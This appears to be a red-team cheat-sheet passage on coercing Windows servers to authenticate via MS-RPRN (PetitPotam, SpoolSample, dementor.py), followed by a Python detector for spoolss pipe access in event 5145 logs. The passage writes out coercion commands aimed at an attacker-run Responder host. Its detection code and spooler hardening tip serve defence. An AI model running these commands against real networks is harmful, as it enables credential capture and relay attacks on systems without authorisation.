A Python script to automatically coerce a Windows server to authenticate to an arbitrary machine through 9 methods.
Link: https://github.com/p0dalirius/Coercer
To catch the auth…
The NTLMv1 response obtained with PetitPotam or SpoolSample can be converted into a Silver Ticket.
Link for guide: https://blog.zsec.uk/chasing-the-silver-petit-potam/
Coerce Windows hosts to authenticate to other machines via the MS-RPRN RPC interface.
Check if a host has the MS-RPRN service listening:
rpcdump.py DOMAIN/USER:PASSWORD@TARGET | grep MS-RPRN
Trigger an authentication:
SpoolSample.exe TARGET RESPONDERIP
Or use 3xocyte's dementor.py if you're on Linux:
python dementor.py -d domain -u username -p password RESPONDERIP TARGET
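
Detection side of the MS-RPRN trigger above, as an added example (not code from Coercer, SpoolSample or dementor.py): the call reaches the spooler through the spoolss named pipe on IPC$, which Windows records as Security event 5145 when Detailed File Share auditing is enabled. The records, host names, IP addresses and the allowlist below are constructed for illustration.

```python
from collections import defaultdict

# Constructed sample records shaped like Security event 5145 exported as JSON.
# "Computer" is the host that logged the event, i.e. the machine being coerced.
SAMPLE_EVENTS = [
    {"EventID": 5145, "Computer": "DC01", "IpAddress": "10.0.0.50",
     "SubjectUserName": "jdoe", "ShareName": r"\\*\IPC$", "RelativeTargetName": "spoolss"},
    {"EventID": 5145, "Computer": "FS02", "IpAddress": "10.0.0.50",
     "SubjectUserName": "jdoe", "ShareName": r"\\*\IPC$", "RelativeTargetName": "spoolss"},
    {"EventID": 5145, "Computer": "FS02", "IpAddress": "10.0.0.9",
     "SubjectUserName": "printsvc", "ShareName": r"\\*\IPC$", "RelativeTargetName": "spoolss"},
    {"EventID": 5145, "Computer": "DC01", "IpAddress": "10.0.0.77",
     "SubjectUserName": "asmith", "ShareName": r"\\*\SYSVOL", "RelativeTargetName": "Policies"},
    {"EventID": 4624, "Computer": "DC01", "IpAddress": "10.0.0.50"},
]

def is_spoolss_pipe_open(event):
    """True for a 5145 record showing a remote open of the spoolss pipe over IPC$."""
    return (event.get("EventID") == 5145
            and event.get("ShareName", "").upper().endswith("IPC$")
            and event.get("RelativeTargetName", "").lower() == "spoolss")

def find_spooler_coercion(events, expected_sources=(), domain_controllers=()):
    """Group remote spoolss opens by source IP, skipping allowlisted print clients."""
    by_source = defaultdict(lambda: {"hosts": set(), "users": set()})
    for ev in filter(is_spoolss_pipe_open, events):
        src = ev.get("IpAddress", "")
        if src in expected_sources:
            continue
        by_source[src]["hosts"].add(ev.get("Computer", "unknown"))
        by_source[src]["users"].add(ev.get("SubjectUserName", ""))
    alerts = []
    for src, seen in sorted(by_source.items()):
        hit_dc = bool(seen["hosts"] & set(domain_controllers))
        # A source touching a DC's spooler, or several spoolers, is triaged first.
        severity = "high" if hit_dc or len(seen["hosts"]) > 1 else "medium"
        alerts.append({"source": src, "hosts": sorted(seen["hosts"]),
                       "users": sorted(seen["users"]), "severity": severity})
    return alerts

if __name__ == "__main__":
    for alert in find_spooler_coercion(SAMPLE_EVENTS, {"10.0.0.9"}, {"DC01"}):
        print(alert)
```

Hosts that appear in these alerts and do not need to print are candidates for having the Print Spooler service disabled.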